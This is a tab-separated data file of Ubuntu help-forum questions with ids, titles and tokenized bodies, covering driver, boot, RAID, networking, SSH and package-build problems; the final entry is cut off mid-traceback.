346066	the system is running in low graphics mode ( nvidia drivers )	i have gone through countless threads on the following error and none have helped . your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . i have nvidia graphic cards and have tried countless things but nothing works . this pops up every time i reboot . the computer was running fine then all of a sudden it crashed and i got this error . any ideas ?
346069	how to recover cpp files ?	i had many code-blocks projects in the documents/bla folder . i accidentally deleted them while working with eclipse and unfortunately ubuntu sync daemon was running then , so the folder has been deleted from my ubuntu 1 too . but those programs were very important . i tried to recover them using foremost but , there are too many cpp files so foremost ended up using all my of 500gb disk space . i do n't know how . so are there any other options available in ubuntu to recover the files ?
346070	difficulty in compiling makefile	can you help me with this ? suman003 @ suman003-lenovo-ideapad-y400 : ~/es7501_lab1/src $ make ccache g++ -ggdb -fpic -i/opt/xilinx/vivado_hls/2013.2/linux_x86_64/tools/systemc/include -i . -i/opt/xilinx/vivado_hls/2013.2/include -mcmodel=medium -lm -llog4cxx -c quadratic_equation_test.cc in file included from quadratic_equation_test.cc:7:0 : types.h:4:22 : fatal error : ap_fixed.h : no such file or directory compilation terminated . make : *** [ quadratic_equation_test.o ] error 1
346072	ubuntu login screen does n't show up after installing postgresql	i just installed ubuntu 12.04 on my new machine and everything works fine . however , when i install postgresql and shut down the computer , when i log back in , there 's no graphical login screen . the screen flashes a login prompt ( white text on a black screen ) , then flashes again and just displays a blinking white cursor in the top left of an otherwise totally black screen . at this point , i can type in my password and it lets me into a fully functional graphical ubuntu ( although there do seem to be some graphical issues with chrome ) if i uninstall postgresql , this problem goes away . but i need postgresql for work ... so how can i have both a working login screen and a postgresql install ? update : through some more experimenting i found that by disabling the postgresql server at startup i can eliminate the issue . i just run : sudo update-rc.d -f postgresql remove however , this obviously prevents posgresql from starting up when i log in ... so if i want postgresql to be running when i log in ... what do i do ?
346073	ca n't stop lamp graceful restart	i just got my first lamp up and running , everything works fine except that my server is restarting itself every sunday . when i read the logs i see `` graceful restart requested , doing restart '' should i just let my server do this or should i stop it ? it seems that some settings get lost in this process , eg : sudo chown -r name : name /var/logs/ after this restart i dont have the permission and then i have to run sudo chown -r name : name /var/logs/ again in order to get it back . here are some logs if it would help : [ sun sep 15 07:35:02 2013 ] [ notice ] graceful restart requested , doing restart 127.0.0.1 - - [ 15/sep/2013:07:35:02 +0000 ] `` options * http/1.0 '' 200 126 `` - '' `` apache/2.2.22 ( ubuntu ) ( internal dummy connection ) '' [ sun sep 15 07:35:03 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.4.17-5+debphp.org~precise+1 configured -- resuming normal operations
346074	sata hard drive errors and raid failure with asus motherboard	problem i am getting sata errors which is causing my raid6 array to fail ( degrade ) . this started happening after i recently replaced my ( msi ) motherboard with an asus m5a97 r2.0 motherboard . is there any way to fix or work around this bug ? configuration ubuntu 12.04.3 lts server . using six seagate 3tb drives ( st3000dm001 ) set up as a 5 drive raid 6 ( and 1 cold spare ) . the drives have 4 primary partitions ( bios_grub , two raid , and swap ) . there are two raid6 arrays , md0 is 1g for /boot and md1 is 2.7t cut up via lvm for the system and data storage . background this was working fine for a couple of years . because of a motherboard failure i changed to an asus motherboard . after installing the new motherboard , i get the errors below and my raid array goes into state : clean , degraded . i have tried removing and adding ( via re-add and add ) /dev/sde3 into md1 and it always fails in a few seconds . using the cold spare to replace the drive resulted in the same errors . i have also tried changing the sata cables and sata port . it seems that i have the same issue in both port 5 and port 6 . is there a difference in the controller between ports 1-4 and ports 5-6 ? searching the web for these errors show lots of people having this issue with various linux distros and laying the blame on everything from faulty sata cables to nvidia drivers . the most promising thing i turned up was a red hat bug report bug 611350 ( https : //bugzilla.redhat.com/show_bug.cgi ? id=611350 ) from 2010 . the exact error was seen by many with fedora 13 . some reported success with adding `` pcie_aspm=off '' to the boot options , and the bug was closed with the release of fedora 15 which solved the issue for the user . this seems to suggest that there is a bug fix that could be applied to ubuntu . error messages kernel : ata5.00 : exception emask 0x10 sact 0x1 serr 0x400000 action 0x6 frozen kernel : ata5.00 : irq_stat 0x08000000 , interface fatal error kernel : ata5 : serror : { handshk } kernel : ata5.00 : failed command : write fpdma queued kernel : ata5.00 : cmd 61/10:00 : e0:58 : bc/00:00:01:00:00/40 tag 0 ncq 8192 out kernel : res 40/00:00 : e0:58 : bc/00:00:01:00:00/40 emask 0x10 ( ata bus error ) kernel : ata5.00 : status : { drdy } kernel : ata5 : hard resetting link kernel : ata5 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) # mdadm -- detail /dev/md1 /dev/md1 : version : 1.2 creation time : thu mar 21 14:31:23 2013 raid level : raid6 array size : 8757904896 ( 8352.19 gib 8968.09 gb ) used dev size : 2919301632 ( 2784.06 gib 2989.36 gb ) raid devices : 5 total devices : 5 persistence : superblock is persistent update time : sun sep 15 21:24:53 2013 state : clean , degraded active devices : 4 working devices : 4 failed devices : 1 spare devices : 0 layout : left-symmetric chunk size : 512k name : cathal:1 uuid : 00588a3b : ddb88169 : aea236fa : a1bcf53d events : 50236 number major minor raiddevice state 0 8 3 0 active sync /dev/sda3 1 8 19 1 active sync /dev/sdb3 2 8 35 2 active sync /dev/sdc3 3 0 0 3 removed 4 8 51 4 active sync /dev/sdd3 5 8 67 - faulty spare /dev/sde3 hardware ausu m5a97 r2.0 bios 1903 07-11-2013 ( old 1503 01-16-2013 ) amd sb950 sata controller - 6x sata 6gb/s realtek 8111f - 1 gige lan amd fx-6350 6 core processor six seagate 3tb drives ( st3000dm001 )
346076	how do i install flash on a chromebook ?	the instructions are start up ubuntu . use chromium to download this version of libpepflashplayer.so . start a terminal and do sudo cp /path/to/libpepflashplayer.so /usr/lib/chromium-browser/plugins/ still in terminal , enter : sudo gedit /etc/chromium-browser/default this should open up gedit with the `` default '' file . in the default file , there should be a line that says : chromium_flags= '' '' in gedit , edit the chromium_flags= '' '' line so that it looks like : chromium_flags= '' -- ppapi-flash-path=/usr/lib/chromium-browser/plugins/libpepflashplayer.so -- ppapi-flash-version=11.3.31.518 -- ppapi-flash-args=enable_hw_video_decode=0 , enable_stagevideo_auto=0 , enable_trace_to_console=0 '' save and exit gedit . however when i try to do step two terminal says missing destination file operand after '/path/to/libpepflashplayer.so /usr/lib/chromium-browser/plugins/' is this command just trying to move the file to the plugins folder because i can not seem to do that manually . i am very novice help .
346077	how to open program installed with .run file ?	i installed a .run file following this method : open a terminal . in gnome the terminal is found in applications > accessories > terminal . navigate to the directory of the .run file . for this example , i have mine on the desktop so i would type in `` cd ~/desktop '' and press enter . type `` chmod +x example.run '' ( press enter ) . now type `` ./example.run '' , press enter , and the installer will run . now the only question i have is , how do i run the program ? i 'm using ubuntu 12.10 64-bit .
346079	how to make /proc/net/ip_conntrack world readable ?	how do i make /proc/net/ip_conntrack world readable so that i can read the file from an ordinary user account rather than just as root ? or if this is not advisable , what 's the reason for the restriction when most of the other files in /proc/net are world readable ?
346081	i can not get any version of ubuntu to boot in uefi mode	normally when boot ubuntu on my uefi computers i get to the grub menu and when i select try ubuntu without installing the screen goes black then flickers quickly and ubuntu starts booting . however on my asus q500a it gets to the grub menu and when i select try ubuntu without installing the screen goes black as normal and at that point it refuses to boot past that point .
346084	the backup gpt table is corrupt	i 'm having an issue when trying to format a pen drive using gparted . i am trying to create a bootable os x installation , and for doing so i 'm formating a usb drive with gpt and then creating 2 partitions : one with the ufi bootloader and other with the os , but once it 's gparted tells me that `` the backup gpt table is corrupt '' and does not read the second partition . it does n't matter the size it will always read the sdb1 and not the sdb2 ( which i need access for copying the files ) . using gdisk i already corrected the gpt ( so gparted does not issue an error ) but the /dev/sdb2 is still not accessible , with its file system unrecognized . can you help with this ? thank you !
346085	enable touch screen on lenovo x1 carbon touch	there are quite a few guides on how to enable touch screens , but none with credentials or specifically to a thinkpad device like the one i have . does anyone know how to enable it or know where i can find a good source ? thanks ! note : i am on a lenovo thinkpad x1 carbon touch running ubuntu 12.04lts . it uses egalax capacitive .
346086	ubuntu 12.04 wo n't boot normally	after i select ubuntu on the grub i get a backlit black screen for a couple of seconds but then the screen goes completely black ( unpowered , unlit ) screen . the computer is still on because i can see the led lights on and also the num lock lights can be turned on and off . if i press the power button the laptop will shutdown . on alt+ctrl+del it will reboot . i 've tried boot repair , changing the quiet splash on the boot loader , updating/upgrading grub but nothing seems to work . p.s . i 'm on a dual boot with win7
346087	ubuntu12.04 lts warning : *.so not found	when i compile a program , there is a warning *.so not found , but i used -l to specify the location of the dynamic library . why does n't it link ? i use ubuntu 12.04 lts .
346091	locking eclipse to the launcher bar	eclipse ( from the android developers bundle ( adb ) ) will lock to the launch bar , but then it is just an icon which can not be opened . i am running ubuntu 12.04lts . any idea how to fix this ? thanks !
346092	installing windows 7 seperate from ubuntu	i have three different hdds . /dev/sda/ is my ubuntu os , which is 12.04 lts by the way . i am a gamer , and although i can play a decent amount of games on ubuntu , i would like to reinstall windows 7 on another one of the hard drives without affecting /dev/sda . i know in the ubuntu terminal i can see /dev/sdb and /dev/sdc . these are my questions : 1 ) how can i tell associate which hard drives are sda , sdb , and sdc ? ( meaning associating the actual hardware on the bios boot menu with the specific drives ) 2 ) if i install windows 7 on a seperate hdd , should n't the mbr be located on that specific hdd ? 3 ) i know there is a way to set up a descending list for my hdds to boot , meaning i can select which will boot first , second , and third . i have my ubuntu hdd set up with the usual 4 partitions , so will grub2 recognize the windows 7 installation ? 4 ) finally , how do i update grub2 in order to add the windows 7 installation , because i would still prefer that specific hdd to boot first . i know it is a lot of questions , thank you in advance for your patience and assistance !
346095	can i remove windows 7 after installing wubi ubuntu	i want to remove windows 7 from which i installed ubuntu via wubi . ( i installed win 7 on top of win xp < both win os are currently in my system > ) but does wubi start from windows loader ? can i get ubuntu if i remove win 7 ?
346098	desktop disapeared	i disabled the unity plug-in , and now all i can see on my desktop is my wallpaper . i am using ubuntu 12.04 lts . is there anyway to fix this ? i just wanted to be able to customize my desktop some , and unity would not let me do it . now my desktop is really customized cause all i have is my wallpaper now ... lol . please help , and thank you .
346099	ubuntu 12.04 does not see cd/dvd burner	i have just recently installer oracle vm virtualbox version 4.2.18 on 64 bit windows 8 machine as host to carry ubuntu 12.04 as guest . all went well until i tried to install k3b and brasero burning programs and both programs do not `` see '' my cd/dvd burner/player . this is very distressing for me as i do a lot of burning . i have scoured the net for a solution but all to no avail . can anyone out there help me ? ? ? ? ?
346105	easier way to rename batch files like windows	ok im finding all the rename options on this site and around the entire internet a hassle i for one would like to rename batch files like in windows where i put in the name and it renames all files such as example - picture picture ( 1 ) picture ( 2 ) in windows all you do is highlight all the files you want to rename and right click and rename them . like in the example i want to name the files `` picture '' and then windows will rename them that with the numbering beside them . could such a feature exist without the major tools and command lines
346108	ubuntu installation help ? - `` the system is running low-graphics mode ''	i have a powermac g5 with a powerpc dual and i am trying to install ubuntu 13 , i have a nvidia geforce 6600le . everytime i try to install ubuntu it passes the dots and then comes up with this error .
346109	how to reduce the amount of ram genymotion uses ?	the android emulator , genymotion , consumes a lot of ram . are there solutions for reducing the amount of ram it uses ?
346111	how do i install nginx modules	i just installed nginx through apt-get repository . but , unfortunately httpauthdigestmodule is not included while installing . this is how to install from source - ./configure -- add-module=../samizdatco-nginx-http-auth-digest-xxxxxxx how do i configure nginx that was installed ?
346113	when shuting down a black screen with a broken pipe message shows for half second	it is actually very fast when it shows , i had to record it to actually saw what it said and it is : could not write bytes : broken pipe checking battery state ... cpid : exiting checking for running unattended-upgrades i have ubuntu 64 bits , 12.04.3 , intel hd 4000 , and i have had several problems with ubuntu as i had to format my laptop quite a few times , i am using only ubuntu , not windows . help please . note : is a fresh install of ubuntu 64 bits .
346114	how to retrieve passphrase for private key ?	i generated dsa key using ubuntu . saved the public key on remote server , such that keys are required before connecting ssh . i have forgot the passphrase for that key . how can i retrieve it ?
346115	installing ubuntu after download	i downloaded the latest version of ubuntu desktop ( 13.04 ) the other day and think i might have missed something , as i did n't see any `` install '' -related buttons or links following the download . the files are stored neatly under 'tools-downloads ' ( as my system is running on an older version of ubuntu ) , but i still do n't know how to install the new software at this point . any help would be greatly appreciated , and given the fact that i 'm a novice when it comes to the technical side of the web , i would also appreciate that your recommendations be outlined in a step by step fashion . ps : on a related note , can it also please be confirmed that the ubuntu desktop download is , in fact , for laptops as well as desktops ( or is there a different version/package altogether for laptops [ i.e . the system i 'm inquiring about ] ) . thanks very much in advance .
346116	`` compiz -- replace '' causes title bars to disappear , unable to move or resize windows	i installed ubuntu studio 12.04.3 lts on an ibm intellistation z pro today & configured it according to the instructions at this site . now i 'm trying to use compizconfig settings manager to adjust the opacity of windows without much luck . in ccsm when i go to the `` opacity brightness & saturation '' section and click 'new'- > '+'- > 'grab ' under `` window specific settings '' it assigns a value but the settings do not go into effect when i click the enable checkbox ( the same goes for other features in ccsm ) . i found that if i hit alt+f2 then enter compiz -- replace it allows me to adjust the transparency of active windows by holding alt and moving my mouse 's scroll button , but when i do this the titlebars of all windows disappear and i 'm no longer able to move or resize any of them until i restart , at which point the windows are no longer transparent . is there a different settings manager i should be using for this or something ?
346117	dual boot : windows 8 session lost after hibernate/sleep	the problem i 'm experiencing is losing the windows 8 session after sleep/hibernate . when resuming the session i would expect to load directly into windows , however the grub bootloader displays . at this point i select the windows bootloader and it starts a new session as though windows has restarted . any suggestions ? system setup : dual boot ubuntu 12.04 and windows 8 using grub 1.99 bootloader .
346118	error while upgrading ubuntu from 10.10 to 11.04	while i 'm trying to upgrade it says that ; `` fetching the upgrade failed . there may be a network problem '' . but i have a very good wifi connection . please advise me on this .
346119	ubuntu 12.04 lts just intalled too slow	i 've just installed ubuntu ( 12.04 lts 32 bit ) on my pc . i have 2 hdd , one for win xp and another one for ubuntu . this is the first time in my life that ubuntu is slower than win xp on the same pc i 've 4gb ram , intel core 2 quad 2.4ghz . it is all in slow motion , the mouse , when i write , and i can not listen to music
346120	older nvidia integrated graphics problem	i have installed ubuntu 8.04 right now . but i tried to install 12.04 and my graphic does n't work correctly . i have nvidia integrated graphic on mb : ms 7309 . which version of ubuntu should i use , my processor is amd 3000+ and i have 2 gb ddr2 ram ?
346122	trouble in unistalling grub	i have a dual boot system in my laptop ( windows 8 and ubuntu ) . i have decided to delete ubuntu and only use windows 8 in the system ( i 'm planning only to use ubuntu from usb boot ) . i tried to delete ubuntu partition from windows 8 and it was n't ended up pretty good , i could n't boot up to my windows 8 anymore . i 've found that i need to uninstall grub first . i also found that i 'll need a windows 8 recovery disk or bootable usb to uninstalling grub but the problem is i ca n't boot up to my windows 8 bootable usb either ( and i do n't have any luck using recovery disk , mine is broken ) . how do i uninstalling grub then ? please help .
346123	edubuntu & thin clients tk-3550 without pae support	for implementing edubuntu ltsp in schools in kosovo i 'm using thin clients termtek tk-3550 . thin clients do not support pae . is there any way to use latest ( ed ) ubuntu ltsp in combination with thin clients without pae support . can i build kernel image for thin clients without pae support and deploy this to thin clients and let them connect to latest ( ed ) ubuntu. ? thank you in advance for your answer , regards , bekim rama
346126	how to disable ipv6 on ubuntu ?	i disabled ipv6 on an ubuntu box which has ssh and rsync running . but both of these are still listening on an ipv6 address . how should i fix this ? root @ box.com : ~ # sysctl net.ipv6.conf.all.disable_ipv6 net.ipv6.conf.all.disable_ipv6 = 1 root @ box.com : ~ # sysctl net.ipv6.conf.default.disable_ipv6 net.ipv6.conf.default.disable_ipv6 = 1 root @ box.com : ~ # sysctl net.ipv6.conf.lo.disable_ipv6 net.ipv6.conf.lo.disable_ipv6 = 1 and root @ box.com : ~ # ss -lnp6 state recv-q send-q local address : port peer address : port listen 0 128 : ::22 : : : * users : ( ( `` sshd '' ,1505,4 ) ) listen 0 5 : ::873 : : : * users : ( ( `` rsync '' ,3423,5 ) )
346128	f1 help in qt creator ( opensource ) ?	i have installed qt creator 2.7.2 'based on qt 5.1.0 ( 32 bit ) ' . is it possible to set it for getting direct help in the edit mode , maybe by pressing f1 key , as i am used to from the microsoft visual studio ? now , i can get help by copying a chosen term to the help mode index , clicking at it and then switch back to the edit mode . i wish to let the found help in another window simultaneously with the edited c++ source code , maybe in the other part of the window , if it is split .
346129	any plans for an unified ubuntu store ?	right now , there 's ubuntu software center on the desktop , click app store on mobile , also there 's an ubuntu one music store , but no book store . is there any long-term plan to get these services unified under one branding and converged on multiple form factors ? ( like you have a google play store where you can buy apps , books , music , movies all under one roof ! ) thank you .
346130	running rosetta stone in wine	i am trying to run rosetta stone in wine but when i load it i get the following : i am trying to run rosetta stone v 3. in wine v 1.4 i installed wine , then i used wine to install rosetta stone and it seamed to install ok , meaning i got no errors . then all i did was set my .exe files to be opened with wine by default . after this i started rosetta stone and the above screen shot was the result . i do not know how to configure wine properly so it may just need further configuration . i am just not sure ... can someone please help ?
346132	how to get a resource file from a project in the qt creator ?	i have installed qt creator 2.7.2 'based on qt 5.1.0 ( 32 bit ) ' . for some examples , i get *.pro , *.h and *.cpp files . it appears that if i want to use the design mode , i need to have a resource *.ui file . is it possible to get the *.ui file from such a project ? how ? thanks .
346139	is there any stable fork of burg available for raring ?	i had a look at burg wiki for installing it on 13.04 and it said that burg is supported for jaunty ( 9.04 ) , karmic ( 9.10 ) , lucid ( 10.04 ) and maverick ( 10.10 ) . is there any fork available for raring ( 13.04 ) ?
346140	why are all my directories and file in the `` dialout '' group	so , i 'm dual booting ubuntu 12.04 and osx on my macbook pro , everything was going swimmingly until recently my battery ran out while the lid was closed . when i powered up and switched back on , there was some weird stuff going on . unity could n't find any applications ( although , i could run them from terminal ) and the osx drive that automounts was read only . i wondered whether something funky had gone on with journaling , so i booted into osx to check disk utility , but booting into osx took a while ( there was a grey progress bar at the bottom of the screen under the apple ) . journaling was still disabled , so i rebooted back into unbuntu and now everything on my mounted osx drive is in the group `` dialout '' . what on earth happened and how do i fix it ?
346143	e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable )	i am trying to install cheese ubuntu @ ubuntu : /usr/src/linux-headers-3.5.0-23-generic $ sudo apt-get install cheese [ sudo ] password for ubuntu : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how to solve this issue please help .
346147	website not opening from linux machines connected with lan or wifi	we have a website which opens from windows machine always . but in linux machines sometimes the website is not opening and i am getting an error message as `` website not available '' . we found the website is opening only to few people who connects the linux machines eg . machine 1 opens the website , machine 2 opens the website then machine 3 unable to open the website . if the machine one closes the browser then machine 3 is able to open the website . how to fix it . even our isp and hosting agent unable to fix it .
346149	ip route - connecting two tun dev	im trying to get two tun dev connected . if got everything , but the nat running . one tun is secure connection and the other tun for internet access . if got everything , but the nat running . there is a table `` vpn '' . i have ip rule add dev tun1 table vpn ip rule add from ip_tun1/24 table vpn but the ip route add default via ip_tun0/24 table vpn wo n't work . the command ip route add nat 10.8.0.0/24 via 10.4.30.0/24 table vpn does n't work either . any suggestions ?
346151	is there a way to block installations of programs on ubuntu ?	we have a small office ( 25pcs ) running ubuntu 13.04 . is there a group policy on ubuntu that will disable all installations of programs . i want to disable the users installing random programs . i know in windows you can , not so sure sure about ubuntu 13.04 . any help will be appreciated . thanks
346152	steam not running on ubuntu 13.04 32-bit	steam just stopped to work . it worked fine until a couple of days ago , but now it wo n't launch . i 've tried both to restart the computer and reinstall steam , but it makes no difference . when i tried to launch it from the console i get only this : marc @ marc-ux21e : ~ $ steam running steam on ubuntu 13.04 32-bit steam_runtime is enabled automatically any idea about what may it be ? thank you . edit : i have tried to launch it after a computer restart and got some kind of error after trying to update steam : running steam on ubuntu 13.04 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) unlinked 0 orphaned pipes gtk-message : failed to load module `` overlay-scrollbar '' installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) [ 0916/102432 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation
346155	how to fsck on with ecryptfs encrypted home directory ? is it necessary ?	i set the switch to encrypt my home directory at installation . i installed ubuntu on a usb pen drive , so the chances to garbage are higher than usual . i have the serious assumption , that the file system ( ext2 ) is broken somehow . i 'd like to do fsck on it . 1 ) is it necessary ? it seems to me , that only the file names and the content of the files is encrypted . so maybe /home is fsck'ed every time . 2 ) how do i fsck the home directory ? sincerely , max
346162	unable to connect to ssh on my laptop	i installed ssh server and client using the commands in ubuntu 13.10 sudo apt-get install ssh but then i am able to connect using my client to any other ssh server on the network by ssh username @ hostname but when i try connecting ssh-client on my laptop to itself . it says permission denied , please try again . $ : ssh shubhang @ 10.109.59.55 shubhang @ 10.109.59.55 's password : permission denied , please try again . can someone help me with this .
346165	how to make snmp agent accept connections from other hosts in the network ?	i have configured snmp agent in my system with ip address 192.168.1.1 i have configured snmp agent in it using the following tutorial i have modified the lines as follows in the file /etc/snmp/snmpd.conf rocommunity public 127.0.0.1 rocommunity public 192.168.1.0/24 rocommunity public 192.168.2.0/24 in the file /etc/default/snmpd snmpdopts='-lsd -lf /dev/null -u snmp -g snmp -i -smux -p /var/run/snmpd.pid' when i try to use the snmpwalk command from the system with ip address 192.168.1.1 it works fine . ex : a chunk of the commands output : iso.3.6.1.2.1.1.1.0 = string : `` linux devenv 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 '' iso.3.6.1.2.1.1.2.0 = oid : iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = timeticks : ( 74328 ) 0:12:23.28 iso.3.6.1.2.1.1.4.0 = string : `` me < me @ example.org > '' iso.3.6.1.2.1.1.5.0 = string : `` devenv '' iso.3.6.1.2.1.1.6.0 = string : `` sitting on the dock of the bay '' iso.3.6.1.2.1.1.7.0 = integer : 72 but when i try to use snmpwalk through a different system with ip 192.168.2.1 it gives no response from 192.168.1.1 . please help . snmpwalk -c public -v1 192.168.1.1 | less ps i have configured the same steps on the machine with ip address 192.168.2.1 . or is there any other program that will be used . edit 1 . did netstat here is a screenshot
346168	how to log and export cpu usage over time ?	i am currently doing a project at school about sound proofing a pc case and need a way to log the cpu load , so that i can graph it against sound and temperature of the case . i am very new to using ubuntu/linux , but as it is free and friends have said that it is easy to use i decided to try it out . thanks in advance , matt
346169	shortcut to bring all open terminals to the front	after i navigate out to a webpage or editor , is there any way to bring all the open terminals back to the front in their original positions ? it is a bit of a pain clicking the terminal icon and then bringing each one back individually . thanks ! example : pre-shortcut : post-shortcut :
346171	exchange of data between two nodes in a high available server [ apache2 ] ( using heartbeat or not ) in a cluster	i want to know if there is a way to do this . meaning if there is a way for data exchange between the two nodes ( primary and secondary ) in a high availability server in a cluster using apache2 . by exchange of data i mean some log files , or an sql db or something else . i will probably need heartbeat for this . kind regards , george .
346177	how to enable 2 printers on the same computer ?	two printers epson t50 send print on the second printer , the first stop . what to do ? how to enable 4 printers on the same computer ?
346179	seeing all installed items on server and protecting server from malware	i 've got a vps running ubuntu 12.04 - i 'm not particularly well versed in server management , but can do basic cl stuff . we 've got some third parties ( from odesk ) working on a web app for us that will be hosted on the vps as part of the build they need access to the server via ssh to run database migrations and other stuff . my main concern is that i have no idea what they are actually putting on the server , i believe they are only putting on items concerning the development of the web app , but equally well they could be installing malware in the background . i plan on installing clamav for virus scanning , but if someone has with root access can that be bypassed ? is there a best practice to a ) protect the server , whist at the same time still giving the third party access and b ) is there a command or somewhere i can see all installed items , so i can see whats actually on there ?
346180	speakers make noise while headphones are plugged in ubuntu 13.04	everyone . i have a lenovo y400 with nvidia 750 . everytime i plug the headphones noise starts coming out through the speakers . if i stop playing music after some seconds the noise stops but when i play something again , the noise returns . i will appreciate any help !
346181	what custom kernel configuration options would best improve ubuntu gaming	when configuring a custom kernel what configuration options will improve gaming performance on ubuntu for example will setting the kernel timer frequency to 1000hz improve gaming performance ?
346186	i do n't have openssh-server , but i can ssh to localhost	openssh-server is not installed on my computer , but i can ssh to localhost or from another computer i can ssh to my computer . it means there is another ssh-server running on my computer . how can i find it ? could you help me ? thanks .
346188	internet does n't work with automatic ipv4 setting	i am trying to connect my laptop to the hostel lan ( wired connection ) . when i use manual settings ( static ip address ) , the internet works perfectly fine . but when i use automatic settings , it works for few seconds and then it stops working . any thoughts on what might be causing this behaviour . i have already tried removing arp cache . it did n't help .
346191	firefox is aksing me to choose an application when i try to download something , but i ca n't find any of them - i just find folders	when i click on a link to download something , such as a torrent , i guet a window that asks me to select an application . i want to choose a software on my computer ( like transmission ) , but the only things i can find are folders ( .doc , .pdf , .mpd3 , etc. ) . it does the same when i want to download from the ubuntu apps directory . i have checked the other topics related to the same problem , but mine is for every download attempts , not just for torrent files . is it a general configuration problem ? i use ubuuntu 12.04 with firefox browser
346192	force unity to open new window on the screen where the cursor is ?	i have 2 screens and i set it as expanded desktop so that there is like one desktop expanding to another screen . anyway , when i open any app from dash they automatically position themselves on screen 1 , top left corner . regardless of the fact that the cursor is on the right screen . how can i set windows opening on the screen where the cursor is ?
346194	which script rotates /var/log/auth.log ?	i can not figure out where /var/log/auth.log is rotated . i found the file /var/log/auth.log.2013-09-16 on my system , which contains log entries previously found in /var/log/auth.log . where does that file come from ? i added the -d -d ' % y- % m- % d ' options to the savelog call in /etc/cron.daily/sysklog and the options dateext and dateformat . % y- % m- % d to /etc/logrotate.conf , but i do not know why this should affect how auth.log is rotated . places that i have investigated : $ grep auth /etc/logrotate.d/* produces no match $ grep auth /etc/logrotate.conf produces no match /etc/cron.daily/sysklog has the following to say about rotation : for log in $ ( syslogd-listfiles ) do if [ -s $ log ] ; then savelog -g adm -m 640 -u $ { user } -c 7 -d -d ' % y- % m- % d ' $ log \ > /dev/null fi done but $ syslogd-listfiles only lists /var/log/syslog as candidate for rotation . other calls to savelog in /etc and its subdirectories rotate history files in registered cvs directories , /var/log/boot and aptitude.pkgstates . $ crontab -l lists some entries for scripts in /opt/psa/libexec/modules/watchdog/cp/ ( i assume they come from plesk panels ) . however , i do n't think they are responsible , because the files in question used to be named with a numeric extension until i added the -d -d ' % y- % m- % d ' options to the savelog call in /etc/cron.daily/sysklog and the options dateext and dateformat . % y- % m- % d to /etc/logrotate.conf .
346196	cloud-init/cloud-config syntax documentation	i am looking for cloud-init/cloud-config syntax documentation . i have been through https : //help.ubuntu.com/community/cloudinit i need to know what all namespace are supported by cloud-init . e.g . `` byobu_by_default '' is a valid resource where as `` this_is_great '' is not a valid resource . i did extensive googling but could not find any documentation also i had been through the âexamplesâ directory and it was helpful but i wanted above said documentation . thanks .
346197	how to configure sflphone or other softphine with german telekom ?	i would like to use a softphone on my desktop . we have an telekom ip contract and they tell me it is possible to use any sip phone . i installed sflphone and tried to enter my credentials but it just fails . i asked my provider , they told me the following : sip-id/benutzer : ihre telefonnummer bildschirmname ( falls vorhanden ) : ihre telefonnummer authentifizierungs-name / benutzername : ihre e-mail-adresse , z.b . `` vorname.name @ t-online.de '' passwort : ihr passwort sip-proxy : tel.t-online.de registrar : tel.t-online.de realm : tel.t-online.de stun-server : stun.t-online.de outbound-proxy : leer lassen oder ebenfalls tel.t-online.de i tried nearly every combination but i ca n't get connected . but i do n't see why . i do n't know where to put what . does somebody know how to debug sflphone ( or other softphone on ubuntu ) to see what fails exactly ? ( or even better : does somebody know how to configure it with telekom ip contract ? )
346199	compositing is not available , please enable compositing support and relaunch netflix desktop . why ?	compositing is not available , please enable compositing support and relaunch netflix desktop . this keeps popping up and im getting very frustrated . ive reinstalled the enire 12.04 distro , updated everything , followed the directions from eric hoover for installing the patched wine/ netflix app . but every time i go to unity and open the netflix app i get this message . and yes i checked compiz , and compositing is already enabled . please help . thank you in advance .
346200	how to use installation files to create an iso image ?	on my windows xp system , i have ubuntu 12.04 wubi installation files ( in separate folders like .disk , boot , casper etc. ) . the root folder contains wubi.exe along with autorun.inf . to avoid a fresh iso image download , i would like to convert these separate files into a single iso image . first of all , is that possible ? if yes , then how ? my goal is to copy the iso to a usb stick to make a live ubuntu usb for trying out ubuntu , before doing a dual-boot installation . thanks in advance makarand
346201	strange problem during installation of pyside	i have ubuntu 10.04 wich qt 4.8.5 , and recently i have been trying to install pyside to create gui for my appliaction . after i am installing it via pip i get an error which is not common as i could not find anything in google about it , here are logs from pip : [ 81 % ] building cxx object libshiboken/cmakefiles/libshiboken.dir/typeresolver.cpp.o [ 83 % ] building cxx object libshiboken/cmakefiles/libshiboken.dir/shibokenbuffer.cpp.o linking cxx shared library libshiboken-python2.7.so /usr/bin/ld : /usr/local/lib/libpython2.7.a ( abstract.o ) : relocation r_x86_64_32 against `.rodata.str1.8 ' can not be used when making a shared object ; recompile with -fpic /usr/local/lib/libpython2.7.a : could not read symbols : bad value collect2 : ld returned 1 exit status make [ 2 ] : *** [ libshiboken/libshiboken-python2.7.so.1.2.1 ] błąd 1 make [ 1 ] : *** [ libshiboken/cmakefiles/libshiboken.dir/all ] błąd 2 make : *** [ all ] błąd 2 error : error compiling shiboken -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command /usr/local/bin/python -c `` import setuptools ; __file__='/tmp/pip_build_root/pyside/setup.py ' ; exec ( compile ( open ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-el3r4y-record/install-record.txt -- single-version-externally-managed failed with error code 1 in /tmp/pip_build_root/pyside traceback ( most recent call last ) : file `` /usr/local/bin/pip '' , line 9 , in < module > load_entry_point ( 'pip==1.4.1 ' , 'console_scripts ' , 'pip ' ) ( ) file `` /usr/local/lib/python2.7/site-packages/pip/__init__.py '' , line 148 , in main return command.main ( args [ 1 : ] , options ) file `` /usr/local/lib/python2.7/site-packages/pip/basecommand.py '' , line 169 , in main text = '\n'.join ( complete_log ) unicodedecodeerror : 'ascii ' codec 